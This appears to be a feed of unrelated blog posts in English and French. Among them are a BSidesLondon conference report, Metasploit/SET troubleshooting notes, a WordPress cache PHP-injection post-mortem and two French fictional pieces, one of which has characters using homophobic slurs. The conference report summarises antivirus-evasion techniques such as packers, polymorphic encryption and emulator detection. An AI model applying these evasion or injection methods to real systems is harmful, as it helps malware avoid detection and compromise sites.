The warning is causde by the mixing of 'keepalive' and 'least_conn', use either one but don't mix both.

I don't usually blog about work, but this time around, you maxed it.

When I specifically ask you to not ship goods, I have good reasons for that. Specifically:

• I'm not at my office all the time. Yes, I'm often there, but I'm also often at a customer's place (you know, so I can actually make money). When I'm not at a customer, I tend to be at the office in a noon-through-evening schedule, rather than a morning-through-late-afternoon one (I hate getting out of bed if I don't have to). Since we don't have any employees, this likely means your logistics partner will find a closed door with nobody answering the bell.
• The result of that is that we'll often find that your shipments end up at your logistics partner's warehouse. Since I have to drive to a warehouse anyway, I might as well choose to drive to the warehouse that is closest—yours.
• For this "service" of shipping goods away from interesting locations, you charge €20+.

Not Happy(tm)

This was already the third edition of BSidesLondon today! Time flies! Being busy yesterday, I just reached London in the morning and arrived just in time for the administrative tasks (registration, pick-up a t-shirt, goodies), grabbing some coffee and shaking some hands. BSidesLondon is definitively growing in size and quality: A huge number of attendees, two tracks, a rookie track, a job fair, workshops and lightning talks. Even the sun was present over London, no fog at all! Two tracks means you have to make choices! Here is the brief overview of my schedule.

The first presentation I attended was “Pentesting like a Grandmaster” by Abraham Aranguren. The talk was split in two parts. FIrst, Abraham started with an interesting comparison: “Pentesting == a chess game“. This can be resumed with the picture below:

How far can you go with “your” intelligence? The success is always possible. They are many examples of great people who made awesome stuff with a normal IQ. Intelligence does not warranty success. One fact: it’s important to start early; this is an advantage. The talent is something natural and skills must be developed by hours and hours (days or months) of training. The comparison continues with the chess game. As reported by many chess champions: “You can only be good at chess if you love the game“.  It’s exactly the same in information technology (generally speaking – not only security). Some quotes are so true:  ”No pain, no gain” (Arnold Schwarzeneger), “Pain is temporary” (Mohamed Ali). The next question could be how to stay motivated. Like in high level sports, your must remain healthy (in your body as well as in your mind). Another interesting quote I liked:

“Smart people learn from their mistakes. But the real sharp ones learn from the mistakes of other people” (Brandon Mull)

Abraham reviewed good tips to stay healthy and keep your attention.  In the second part of the talk, he explained why the game preparation is a key (again in chess and pen testing). Before the game: scope better, do better. Know the enemy but know yourself (strengths & weaknesses). Finally, some examples were reviewed of how a good preparation helps to pwn your target easily.. But keep in mind: When media report an exploit “in seconds“, it took usually days or weeks to prepare it. The examples were demonstrated using Abraham’s project: OWTF. I liked the comparison between the two worlds which initially have nothing in common. Great talk to start the day.

For the second talk, my choice was to follow Javvad Malik about his own story “How to build a personal security brand that will stop the hackers, save the world and get you the girl“. What a program! The room was crowded with people sitting on the ground! This is always a good sign. Javaad is a showman, have a look at his Youtube channel about information security, a must see. His talk was a reflexion about people who are “bankable” in information security. Starting with a fact: why everybody found Mother Theresa a personality? It’s the same in information security. Javvad showed a nice graph of knowledge vs fame. Then he defined three levels: echo chamber, industry, public and put famous people on it:

(Note: the hidden face is Gregory Evans

The key is the message you have to pass and how to deliver it. Today,  we have access to the same tools and services as professionals a few years ago to promote ourself. How to find the right idea to promote ourself? Via podcasts, blogs, mentors & continuous feedback.  Often security people act like the actors doing the promotion of Hollywood movies: they visit many places, are facing the same questions and constantly repeat the same sentences. Same message is broadcasted again & again. But what makes a good infosec guy? Javaad showed two pictures of Fish & Chips. Prepared with the same food but presented differently.  The same may apply with blogs: a blog post could be a very good research but badly presented. Also, the message we have to deliver is often bad news: “you got owned“, “you lost data“, etc. Then the procrastination and comfort zone are part of the game. Being a “public” man forces you to remain visible. Question to the audience: Who has a blog and did not updated it for a long time”. I personally know this feeling. We make this on our free time but have wife, kids. Another tip: “Do not feed the troll“. There is a difference between trolling and criticism. Javaad’s receipt was:

• He discovered himself
• He created his own rules
• He believed

Excellent non-technical presentation but with true content and lot of fun.

The third talk was presented by my friend Chris John Riley: “Defense by Numb3r5” or “Making problems for script k1d13s and scanner monkeys“. Chris started with a description of the use of HTTP return codes. You know the 2xx, 3xx, etc. Some are common, others less like 206 which means “partial content“. Most of them are defined in the RFC 2616 and divided on five classes of response:

• 1xx (info)
• 2xx (success)
• 3xx (redirection)
• 4xx (client error)
• 5xx (server error)

Personally, I like the 402 – “payment required“. Chri’s question is why talk about numbers? For security reason of course. What can we do with them? Unpredicatability is at your advantage in your defense layer. Increase attacker costs, delay operations. There was already some ideas about this topic but not very deeply analysed. So, how to use this? Browsers have to be flexible. This leads to interpretation! But wait, there are RFC for that? They’re more than a guideline. What can possibly go wrong? Chris made some testing using a MitM proxy written in Python. Goal of this proxy: If the response code is not 200, respond with a 200 . A exampe of script is available on his blog:

http://catch22insecurity.com/POC/respcode.php?code=200

Chrome, Firefox and Internet Explorer were tested against all codes with HTML, Iframe & JavaScript pages. What a surprise: They interpret differently. Codes are often associated with headers. Ex: 302 & Location:. If headers are missing, what’s happening?  What can we do with this:

• Browser fingerprinting (UA can be spoofed but behaviour no)
• Proxy detection

Let’s put all the stuff together. Simply fuck with things and defeate attackers (slowing down, case false positives/negatives etc). By changing the answers to HTTP requests performed by crawlers and scanners, Chris demonstrated the different kinds of results with, depending on the cases, many false positives or false negatives. Finally, he had the idea to write an HTTP Tarpit: attacks detected by a WAF are send to a bad list to the server which rewrites all the responses to those IP’s. Even more funny, Metasploit performs attacks also based on HTTP response code (>800 occurrences found in the code). Chris’s concluion: “No match, no shell“. Script kiddies go away! The MitM proxy code is available here.

After a sunny lunch break outside and some Club-Mate, my schedule continued with Stephen Bonner and his “Make cyber-love not cyber-war” talk. Based on slides with pictures only, Stephen reviewed the current situation of cyber-war and explained why he does not like this expressions. Very good speaker, good interactivity with the audience but I was not attracted by the topic.

Then followed “Pentest automation – Helping you to get to the pub on time” with Rory McCure. The goal of this talk was to review different ways to optimise your time during pentesting activities to go back early to home … or to the pub! Rory started with a general question: Why automate?

• To save time!
• Repetition is boring and we are all lazy people
• For accuracy: how to not miss interesting stuff?
• To encode your knowledge! If you script it, you won’t forget what you learned

It’s a fact, if you’re a pentester, you must be able to write some code. The next question which will arise is: In which language(s)? Rory’s recommendation is to pick up one and stick to it. How to choose? The language should be

• Dynamic
• Provide an Interactive shell
• Focus on development speed
• And have a good 3rd party library support (to easily add extra features to your scripts).

Another tip: use source code control (subversion, git, etc), it will save you time and headaches. To better learn, find real examples you need to solve. Then Rory reviewed some nice scenarios where scripts can be helpful. His examples were written in Ruby:

• Expanding a subnet in an IP addresses list. Easy but so convenient
• Writing a template using the ‘mechanize‘ Ruby library to automate a dual-steps authentication process.
• Parsing the output of tools like nmap.

Scripts can also be used to automate very boring tasks: reporting! Major security tools can be extended using plugins or extensions (whatever you name them). Think about Metasploit or Burpsuite. Contribute and add your own code to automate your tasks. A final remark to the presentation: If infosec guys complain about the bad quality of code delivered by customers, they are also writing bad code to automate their tasks. Try to write secure code yourself! The examples reviewed by Rory are available on his github account.

The last talk was the one of Alex Polychronopoulos about “Going Stealth: Staying off your AV  radar“. Again an interesting topic for pentesters who have to fight often with anti-virus programs and try to evade their detection mechanisms. Today’s AV features are:

• Detection
• Identification
• Disinfection
• Some of them implement more funky stuff like built-in IDS, browser add-on, etc ($VENDORS have always plenty of ideas)

Anti-virus evasion sometimes can be quite easy (some files are simply not scanned like *.tmp or *.ocx files) and less than 5% of new threats are detected. Alex reviewed the different type of analysis. Static analysis is not efficient today. Detection based on signatures are out of business for new threats. The code can be easily obfuscated (via “packers“). Today, dynamic analysis is better (it executes the malicious code and observes its behaviour) but the main weakness of emulators is… the emulation! The malware can slow down execution (using multiple sleep() calls), use uncommon CPU instruction sets or simply detect the emulator (and not perform any malicious activity). How to evade? First tip: See big! Most anti-virus have a file size limit for performance reasons. Second,  what about destroying the AV itself? After all it’s also a software like any other with bugs.  Research is always helpful to find new evasion techniques. What about packers? Their goal is to produce a new executable from… an executable and make it more difficult to be detected by AV. Problem: they do not like self modifying code! Better packers encrypt the code. The key can be randomised for each payload (polymorphism). If you don’t like encryption, use your math classes and implement other algebra transformations to build a better packer. Don’t forget to hide your strings! (can also be used a signatures). Don’t forget that any packer, best of all, will always become a signature at a time. What about metamorphism? Examples: Use random registers, substitute instructions, randomly add track code. Put all this techniques together to write your best packer. Interesting stuff but lacking of real examples. Some packed files passed through antivirus would be funny (with a low detection rate of course).

In parallel to the regular tracks, the rookie track given the stage to new coming speakers. There was some interesting topics like:

• Blinking hell – Data extraction through keyboard lock states
• External assessments
• ICMP – The proxy your admin hates to block

I hope that slides will be released soon! Kudos to the BsidesLondon team for the great event!

After some beers at the after party, I went out for a dinner with friends to discuss about security arround Italian food. Tomorrow, let’s dive into the $VENDORS jungle at InfoSecurity Europe before travelling back to Belgium!

Le 23 avril, Bernard et Jean-Pierre se sautaient dans les bras. Aujourd’hui, avec un petit groupe d’une centaine de personnes, ils manifestent devant l’Élysée en réclamant une solution. Des panneaux “Égalité” et “Pour tous” sont brandis.
— Nous ne pouvions y croire, murmure Jean-Pierre avec un brin de nostalgie. À l’époque j’étais réellement amoureux.

Les deux amants ont donc immédiatement accompli les formalités nécessaires et, en juin 2013, ils comptaient parmi les premiers couples homosexuels mariés en France. Dans la foulée, ils achètent un appartement en banlieue parisienne.

Mais, dès septembre, le couple bat de l’aile.
— Je ne connaissais pas Berrnard sous ce jour. Il est devenu colérique.

À part, Bernard nous confie :
— Cette salope de Jean-Pierre est sorti avec Sabrina, ma meilleure amie, un soir où j’étais en voyage d’affaire. Il avait bien caché ses penchants hétéros.

La situation devenant tendue, le couple décide de divorcer. Mais à la première audience, surprise : la loi n’autorise le divorce qu’entre un homme et une femme. Si le vote du 23 avril a rendu le mariage accessible aux couples de même sexe, il n’en est pas de même pour le divorce.

Refusant chacun d’abandonner l’appartement qu’ils ont acheté ensemble, Bernard et Jean-Pierre sont donc forcé de cohabiter. Ce que Jean-Pierre considère comme très éprouvant.
— Comme je travaille essentiellement à domicile, cela me force de vivre 24h sur 24 avec une pédale comme Bernard. Sans compter que ma relation avec Sabrina en souffre énormément.

Leurs amis ont bien essayé de trouver un arrangement.
— Je veux bien revendre mes parts de l’appartement, nous dit Bernard, mais j’exige la garde de Kiki, mon hamster.
— Hors de question que je laisse mon hamster à une tantouze, tempête Jean-Pierre.
— C’est mon hamster, espèce de vieux pervers !

Les deux époux ont donc lancé le Divorce Pour Tous, un collectif qui a pour but de réclamer l’égalité devant le divorce. Kiki en est rapidement devenu l’icône, ainsi que nous confie une militante qui brandit un panneau à son effigie :
— Si je suis ici c’est parce que je trouve injuste qu’une pauvre bête comme Kiki souffre à cause de la bêtise des hommes. À cause d’une loi mal conçue, ce hamster est obligé de vivre dans une situation conflictuelle permanente, tiraillé entre ses deux papas. C’est affreux. Le parlement doit agir pour mettre fin à cette situation ! Pour sauver Kiki, nous réclamons le divorce pour tous.

Et la centaine de militants de reprendre avec elle :
— Pour sauver Kiki, le divorce pour tous !

JBoss AS was renamed to reduce confusion. The term JBoss commonly referred to: the JBoss Application Server project, the JBoss Community or the Red Hat JBoss product line.

Ref : http://www.wildfly.org/

There’s real gems to be found on KCRW’s YouTube channel, which features artists that perform live in the studio. Laura Mvula is a upcoming UK vocalist and you can see her performing “Sing To The Moon” below. Enjoy!

Watch this video on YouTube or on Easy Youtube.

The last weekend, an ethical hacking event was organised in Belgium. The Hacknowledge Contest joined Charleroi and was hosted at the CPEHN. This event was previously organised only in France thanks to the initiative of the ACISSI. Last year, they decided to open their challenges to other countries. The current list of participating countries is: Côte d’Ivoire, Maroc, Benelux, Espagne and France. The organisers are already looking to extend their list with other countries. If you are interested, maybe contact them.

Initally, I registered a small team with a colleague and finally we were five ethical hackers/friends to participate as “UID(0)“. So, we joined Charleroi Saturday afternoon to attend a bunch of small talks around information security. Small event and a relaxed atmosphere. The covered topics were:

After a break and the registration of all teams, the challenges started for a period of 12 hours (Saturday 10PM to Sunday 10AM). No CTF, no blue team nor read team but a list of challenges to solve similar to the SANS Netwars. Each challenge solved gives you points. Seventy challenges  were  categories were split in the categories like:

• Web technologies
• Crypto
• Network
• Forensics
• Hardware (lockpicking, Teensy, barcodes, …)

It was very friendly with good times, music. We finished at the third position but very close to the second team… Only the first two teams won, too bad! The final contest will be organised in France and the winning team will receive a very nice price: a trip all-inclusive to Las Vegas to attend the DefCON security conference!

I don’t often participate to events like this one. I liked the limited number of teams (5) and the friendly atmosphere between the team. Not too small, not too big, well organized. The event was also covered by some Belgian media.

Ever wondered what Devops would look like when it would be invented by Coca Cola?

Enjoy my Ignite session from Devopsdays Paris 2013

One simple way around this, is to take one server that's on the same network as the Oracle VM Server's management network, for instance, the Oracle VM Manager system... and install something like TinyProxy on that machine. Then, use that servername as the proxy in Oracle VM Manager when you import a VM, VM Template or VM Assembly.

TinyProxy can be found in the EPEL repository (http://fedoraproject.org/wiki/EPEL). The tinyproxy RPM will install without issue on Oracle Linux. It is very easy/simple to configure and this can be a good workaround or solution to make it easy to import templates or VMs while the servers are on a more isolated network.

tar xzf inetsim-1.2.3.tar.gz
wget http://documentation.vandeplas.com/inetsim/inetsim_incrementaldns.patch
cd inetsim-1.2.3/
patch -p1 < ../inetsim_incrementaldns.patch

patching file conf/inetsim.conf
patching file lib/INetSim/Config.pm
patching file lib/INetSim/DNS.pm
Hunk #1 succeeded at 67 with fuzz 2.

We survived a fourth edition of LOADays, we had a good turn-out and a lot of positive feedback. We want to thank all the speakers, sponsors and visitors. A special thanks goes to Don Bosco Werken en Leren Wilrijk, they provide us with the venue and a lot more.

The slides of the presentations have been added. Use the Schedule to find the presentations.

We would like people to subscribe to our mailing list. This mailing list will be used to announce next events, related events or colocated events. You can hang out on irc FreeNode channel #load, or just mail us on info(at)loadays(dot)org for any questions, suggestions or remarks.

Here are some of the blogs about LOADays 2013 :

• http://czanik.blogs.balabit.com/2013/04/czp-loadays/
• http://www.krisbuytaert.be/blog/initial-loadays-speakers-announced
• http://toshaan.com/loadays-2013-report.html
• http://grep.be/blog/en/life/events/load2013
• http://blog.aeolusproject.org/aeolus-will-be-at-loadays-2013/
• https://blog.kumina.nl/2013/04/loadays-2013-and-kumina/
• http://www.openminds.be/nl/evenementen/detail/loadays
• http://www.open-future.be/loadays-6-till-7th-april
• http://www.openqrm-enterprise.com/community/project-blog/post/article/openqrm-tutorial-at-loadays-2013-in-antwerp-1.html
• http://blog.opennebula.org/?p=4460
• http://blog.opennebula.org/?p=4421
• http://architects.dzone.com/articles/initial-loadays-speakers

I`m an oldschool guy .. I still love pop3(s) to get my mails locally and read them with my fat email client. Evolution.

So when gmail breaks their pop/imap infra I`m screwed for a while. I hate reading mail from a web gui and the collapsed threading model gmail uses makes me nauseus.

So I fiddled with my config .. disabled it.. deleted the account.. created it again. But even after gmail was up again . I couldn't access my mail from my favourite client. Yet from other clients it seemed to work.

This obviously is real fun when you are travelling and trying to keep an eye on a number of different email threads ..

So I`m back home from Paris now and spend some 10 minutes figuring out what could be wrong.

I ran into https://bugzilla.redhat.com/show_bug.cgi?id=949180 which points out that for newly created there is a problem with the keyring prompting

And refers to https://bugzilla.redhat.com/show_bug.cgi?id=953641 accounts Which states that gcr-3.6.2-3 breaks password prompt/keyring unlocks.

And indeed ..

yum shell
Loaded plugins: langpacks, presto, ps, puppetverify, refresh-packagekit
> remove gcr
> install gcr-3.6.2-1.fc18
adobe-linux-x86_64                                       |  951 B     00:00     
fedora/18/x86_64/metalink                                |  31 kB     00:00     
google-chrome                                            |  951 B     00:00     
google-earth                                             |  951 B     00:00     
google-talkplugin                                        |  951 B     00:00     
rpmfusion-free-updates                                   | 3.3 kB     00:00     
rpmfusion-nonfree-updates                                | 3.3 kB     00:00     
updates/18/x86_64/metalink                               |  24 kB     00:00     
rpmfusion-free-updates/primary_db                          | 279 kB   00:01     
> run
 --> Running transaction check
---> Package gcr.x86_64 0:3.6.2-1.fc18 will be installed
---> Package gcr.x86_64 0:3.6.2-3.fc18 will be erased
 --> Finished Dependency Resolution
 
 ================================================================================
  Package       Arch             Version                Repository          Size
 ================================================================================
  Installing:
   gcr           x86_64           3.6.2-1.fc18           fedora             627 k
  Removing:
    gcr           x86_64           3.6.2-3.fc18           @updates           2.3 M
 
    Transaction Summary
 ================================================================================
  Install  1 Package
  Remove   1 Package
 
    Total download size: 627 k
    Is this ok [y/N]: y
    Downloading Packages:
    gcr-3.6.2-1.fc18.x86_64.rpm                                | 627 kB   00:02     
    Running Transaction Check
    Running Transaction Test
    Transaction Test Succeeded
    Running Transaction
      Installing : gcr-3.6.2-1.fc18.x86_64                                      1/2 
      Cleanup    : gcr-3.6.2-3.fc18.x86_64                                      2/2 
      Verifying  : gcr-3.6.2-1.fc18.x86_64                                      1/2 
      Verifying  : gcr-3.6.2-3.fc18.x86_64                                      2/2 
           Removed:
              gcr.x86_64 0:3.6.2-3.fc18                                                     
           Installed:
             gcr.x86_64 0:3.6.2-1.fc18                                                     
 
               Finished Transaction
                > quit
             > Leaving Shell

Solved the problem

A quick post to share with you my feedback about an issue I faced after a SET (“Social Engineering Toolkit“) upgrade to the latest version (5.0.3). SET is a wonderful tool that you must master.  I’m using SET on a EC2 instance because it does not interfere with my other IP addresses and I can enable all ports without any issue (nothing else is running on this instance). Note that Amazon has a specific policy to make pentesting from their infrastructure, have a look here).

My current environment is:

• Ubuntu 12.04-LST (fully patched)
• SET 5.0.2 (installed from the git repository)
• Metasploit 4.6

After the SET upgrade, I faced the following error when launching Metasploit from SET (full error dumped to allow the Google crawler to do its job)

set:phishing> Setup a listener [yes|no]:yes
/opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require': no such file to load -- active_support/concern (LoadError)
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3/lib/msf/core/module_manager/cache.rb:4
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3/lib/msf/core/module_manager.rb:27
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:66
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3/lib/msf/core.rb:34 
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console/driver.rb:2
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console.rb:11
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3/lib/msf/ui.rb:11
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
 from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
 from /opt/metasploit/apps/pro/msf3//msfconsole:136

Metasploit was running fine when started manually from the command line. Google found a thread on a forum about the same kind of problem. The suggestion was to setup the right environment for Metasploit using the setenv.sh script. Note: Be sure to execute the script using ‘source‘ otherwise a new shell will be spawned and closed immediately without changing your environment:

# source /opt/metasploit/scripts/setenv.sh
# se-toolkit

Same issue, I tried to load ‘active_support/concern’ manually, it worked:

# ruby
require('active_support/concern')
^D
#

Finally, I upgraded the installed Ruby gems with the following command:

# gem update `gem list | cut -d ' ' -f 1`

And the problem was solved! Don’t ask me why, I did not dive into the code and I’m not a Ruby guru it worked for me. If you are facing the same problem, think about upgrading your Gems. Just sharing…

Here is my list of installed Gems:

# gem list

*** LOCAL GEMS ***

actionmailer (3.2.13, 3.2.11)
actionpack (3.2.13, 3.2.11)
activemodel (3.2.13, 3.2.11)
activerecord (3.2.13, 3.2.11)
activeresource (3.2.13, 3.2.11)
activesupport (3.2.13, 3.2.11)
acts_as_list (0.2.0, 0.1.5)
arel (4.0.0, 3.0.2)
authlogic (3.3.0, 3.1.0)
bigdecimal (1.1.0)
bson (1.8.5, 1.6.4)
bson_ext (1.6.1)
builder (3.2.0, 3.0.4)
bundler (1.3.5, 1.1.2)
carrierwave (0.8.0, 0.7.0)
chunky_png (1.2.8, 1.2.6)
coderay (1.0.9, 1.0.8)
compass (0.12.2)
daemons (1.1.9, 1.1.8)
erubis (2.7.0)
eventmachine (0.12.10)
formtastic (2.2.1, 2.1.1)
fssm (0.2.10, 0.2.9)
hike (1.2.2, 1.2.1)
i18n (0.6.4, 0.6.1)
ice_cube (0.10.0, 0.9.1)
io-console (0.3)
journey (1.0.4)
jquery-rails (2.2.1, 2.1.3)
json (1.7.7, 1.6.6, 1.6.5, 1.5.4)
kaminari (0.14.1, 0.14.0)
libv8 (3.16.14.1, 3.11.8.17 x86_64-linux, 3.3.10.4 x86_64-linux)
liquid (2.5.0, 2.3.0)
mail (2.5.3, 2.4.4)
method_source (0.8.1)
mime-types (1.22)
minitest (4.7.2, 2.5.1)
msgpack (0.4.6 ruby)
multi_json (1.7.2, 1.5.0)
nokogiri (1.5.2 ruby)
pg (0.13.2 ruby)
polyglot (0.3.3)
pry (0.9.12, 0.9.10)
rack (1.4.5, 1.4.1 ruby)
rack-cache (1.2)
rack-ssl (1.3.3, 1.3.2)
rack-test (0.6.2)
rails (3.2.13, 3.2.11)
railties (3.2.13, 3.2.11)
rake (10.0.4, 10.0.3, 0.9.2.2)
rdoc (4.0.1, 3.12, 3.9.4)
ref (1.0.4)
robots (0.10.1)
sass (3.2.7, 3.2.1)
slop (3.4.4, 3.3.3)
sprockets (2.9.2, 2.2.2)
state_machine (1.2.0, 1.1.2)
therubyracer (0.9.10)
thin (1.3.1)
thor (0.18.1, 0.16.0)
tilt (1.3.7, 1.3.3)
treetop (1.4.12)
tzinfo (0.3.37, 0.3.35)

Dear friends,

If you’re in the Washington DC area next Tuesday, April 23rd, why not drop in on our complementary Big Data Forum:

http://events.pentaho.com/Big-Data-Forum-Registration.html

Come and listen to us and our partners Cloudera, 10gen and Unisys and see what we can do for you in the Big Data space.

See you soon in DC!

Matt

Now that both WP Super Cache and W3 Total Cache developers have released a new version of their respective plugins (upgrade first, continue reading after) it seems time for a small “post mortem“.

The problem was in the interpretation of dynamic snippets, that are contained inside a number of specific HTML-comment tags. These snippets allow both plugins (and their predecessor WP Cache) to cache pages while keeping a limited amount of dynamic, PHP-generated content in them that can be executed on the fly. Think ESI in e.g. Varnish.

The vulnerability, which was originally discovered by kisscsaby and reported 3 weeks ago on the wordpress.org plugins support forum, had multiple causes:

1. Unlike ESI’s, dynamic snippets can not only be includes (mclude) but also PHP-code (mfunc). Whereas one could consider includes of known files more or less safe, inclusion of PHP-code introduces a risk.
2. As WP Super Cache & W3 Total Cache keep entire pages in cache and as pages can contain comments, that user generated content is parsed for dynamic snippets as well.
3. WordPress core by default only allows a limited set of HTML in comments (“a blockquote code em strong ul ol li”), but it also leaves HTML comments in place.

As a result, blogs with WP Super Cache (before version 1.3) and W3 Total Cache (before version 0.9.2.9) were at risk of PHP code injection. Blog comments could contain dynamic snippets (in HTML-comments) and WordPress core did not them filter out. Upon a such a malicious comment having been submitted, a new cached version of the page was created that included the injected PHP-code. Upon the first request of the cached page, that code was successfully executed.

I stumbled on the vulnerability report about a week and a half ago, while researching why dynamic snippets weren’t executing when Autoptimize was active (simple really, Autoptimize by default removes HTML comments, the upcoming 1.6.3 will leave mfunc/mclude in place). As this seemed like a pretty severe security hole and as there was no feedback from developers in the support thread, I created a small “stopgap plugin” to mitigate the threat on April 10th, mailed security@wordpress.org and plugins@wordpress.org and requested WP Safer Cache being published on wordpress.org on the 11th. A couple of hours later WP Super Cache’s Donncha O Caoimh contacted me and the same day he released a version (1.3) that fixed this vulnerability by parsing out potential exploits from comments as they are posted and as they are rendered. On April 12th W3 Total Cache’s Frederick Townes confirmed they were working on a fix. Version 0.9.2.9 got released on April 17th, disabling dynamic snippets by default and when these are enabled, they require a secret alphanumeric key to be included in the snippet which is checked against one that is defined in wp-config.php.

Conclusions; The fact that this didn’t generate any fuss (as opposed to W3 Total Cache’s widely published information disclosure vulnerability in December 2012) is surprising. PHP Code injection clearly is a more severe security risk that must have been there for a long time already. The fact that this only got discovered recently is baffling. And why WordPress core doesn’t filter out HTML-comments from submitted blog comments, others seem to understand, but to me that remains the biggest mystery of all.

Il fait chaud. Dans un nuage de poussière nauséabonde, le vieux bus bringuebalant s’arrête devant nous. D’un revers de la main, j’essuie la goutte de sueur qui perle au dessus de mes lunettes de soleil. Une foule criarde s’engouffre dans l’antique tacot en fer blanc, me pressant, me collant et me dévisageant avec amusement.

Je jette un coup d’œil inquiet à mon téléphone : montez dans le bus 42 et insérez 200 chtongs dans le récepteur à côté du chauffeur. Attention, le symbole suivant indique que le paiement se fait au débarquement et non à l’embarquement.

Relevant la tête, je constate que le chauffeur m’invective. Sa bouche édentée mâche une matière brunâtre tandis que, d’un geste insistant, il m’indique alternativement le fond du bus et un symbole illuminé au dessus de sa tête. Le symbole de paiement à la sortie. Derrière moi, la foule s’impatiente. Je murmure une excuse en patois local, si je dois en croire ce que mon téléphone m’a inculqué dans les semaines précédent le départ, et je m’élance vers le fond de l’engin où j’ai à peine le temps d’empoigner ce qui fut une poignée de cuir avant que le démarrage ne me projette sur mes compagnons de voyage.

Durée de trajet estimée : 18 minutes, toujours selon mon téléphone. De toutes façons, il me préviendra quelques minutes avant mon arrêt de destination, au cas où je m’assoupirais.

Je n’ai jamais été très aventurier dans l’âme. Mais la technologie m’a permis de découvrir le monde en chair et en os. Depuis trois ans, j’investis annuellement deux ou trois bitcoins dans un grand voyage de découverte. Et je n’ai jamais eu à le regretter. Sauf la première fois lorsque, dans une étape, j’ai découvert un cafard dans mes draps de lit. Ma note de 0 sur cet hôtel a fait comprendre à Wikitravel que si j’étais assez souple sur le confort, j’avais néanmoins une certaine exigence de propreté.

Mais le système d’apprentissage a fonctionné à merveille : je n’ai plus que des hôtels honorables tout en restant relativement typiques et dans ma limite de budget.

Cette année, j’ai fait entièrement confiance. J’ai simplement déclaré que je voulais visiter le Zizikistan Oriental, j’ai donné mes dates approximatives et mon budget. Wikitravel a fait le reste, en minimisant les escales et allant jusqu’à réserver le taxi et le payer à l’avance pour m’amener de mon domicile à l’aéroport. À chaque étape, je n’ai qu’à suivre mon téléphone. J’ai des rappels pour tous les événements importants, il me signale les bus, les arrêts. Il m’avertis lorsque je dois presser le pas car je me suis trop éloigné et affiche un QR code pour franchir les portes d’embarquement à l’aéroport. Même les places dans l’avion sont choisies selon mes goûts.

Dans les semaines qui précèdent, je peux m’entraîner à prononcer les phrases usuelles dont je vais avoir besoin : bonjour, au revoir, merci, pardon. Et laissez-moi vous dire que le Zizikistanais, ce n’est pas une sinécure.

Bzzzz ! Mon téléphone vibre. C’est ici que je descends du bus. Je dépose deux pièces de 100 chtongs dans le réceptacle et murmure un remerciement au conducteur. Derrière moi, le bus redémarre dans un vrombissement de vieux gazoil brûlé. Après quelques dizaines de mètres sur les cailloux brûlants, j’arrive à un antique panneau délavé, placé en des temps antédiluviens par un office de tourisme bien intentionné mais manifestement fâché avec l’anglais.

Ce qui ne m’incommode pas le moins du monde, mon téléphone me fournissant toutes les informations utiles ou simplement intéressantes. Dans le cas présent, il me signale de suivre les symboles jaunâtres placés sur des piquets de bois. Nul besoin de rester rivé sur mon téléphone : il m’avertira si je m’éloigne de plus de cent mètres de mon itinéraire, me laissant le choix de marquer cet écart comme volontaire ou non.

Le planning initialement proposé par Wikitravel tenait compte de mes préférences : monuments historiques, ballades dans la nature et un jour ou deux sur une plage pour terminer. Comme les plages du Zizikistan Oriental sont particulièrement célèbres, j’ai ajusté le voyage pour y passer 3 jours. Tant pis pour la visite du village aborigène. Mais aujourd’hui, j’ai enfilé mes chaussures pour une randonnée de 10 km à travers la forêt tropicale. Une ballade jusqu’à un petit temple perdu dans les brumes de la jungle marquée, par Wikitravel, comme à ne pas manquer car elle permet une immersion dans la faune et la flore locale.

Encore un panneau jaune ! Décidémment, cette randonnée est bien balisée. Je m’arrête un instant pour prendre des photos d’une splendide libellule. J’enregistre également une séquence son des bruits de jungle. C’est magique ! Tout cela est génère automatiquement un diaporama avec la carte de mes déplacements, mes notes personnelles, les sons, vidéos, photos. Ce diaporama est partagé en temps réel avec mes amis proches et ma famille car, oui, même dans la jungle Zizikistanaise il y a du 3G.

Chaque soir, j’édite mon “carnet de voyage” en supprimant les photos marquées comme inutiles ou ratées par mes amis. Je décide également de rendre public certaines notes, surtout les appréciations, et les images les plus jolies. Le tout agrémente WikiTravel et sera certainement utile aux voyageurs suivants.

Alors qu’ils avaient une avance certaine avec Latitude et Maps, l’hégémonie de l’omniprésent Google est pour une fois remise en question. Qui plus est par la fondation Wikimedia !

D’ailleurs, j’ai toujours répugné à confier mon budget à Google. L’un des points forts de Wikitravel est justement la gestion totale du budget. Les hôtels et les vols sont bien entendu réservés à l’avance mais Wikitravel va jusqu’à prévoir le prix du bus local, me suggérer la quantité de monnaie locale à retirer, me conseiller le petit restaurant typique pas cher sans aucun intérêt publicitaire autre que s’adapter à mes goûts et mes désirs de découverte.

Le 1% du prix total versé automatiquement comme “donation” à la fondation Wikimedia n’est donc que justice. Surtout depuis qu’elle s’occupe également d’OpenStreetMap, qui est une pierre angulaire de WikiTravel. D’ailleurs, on peut configurer ce pourcentage et choisir un prix libre. Un business model assez intéressant et qui a donné une bouffé d’oxygène à la fondation dont le produit phare reste Wikipédia.

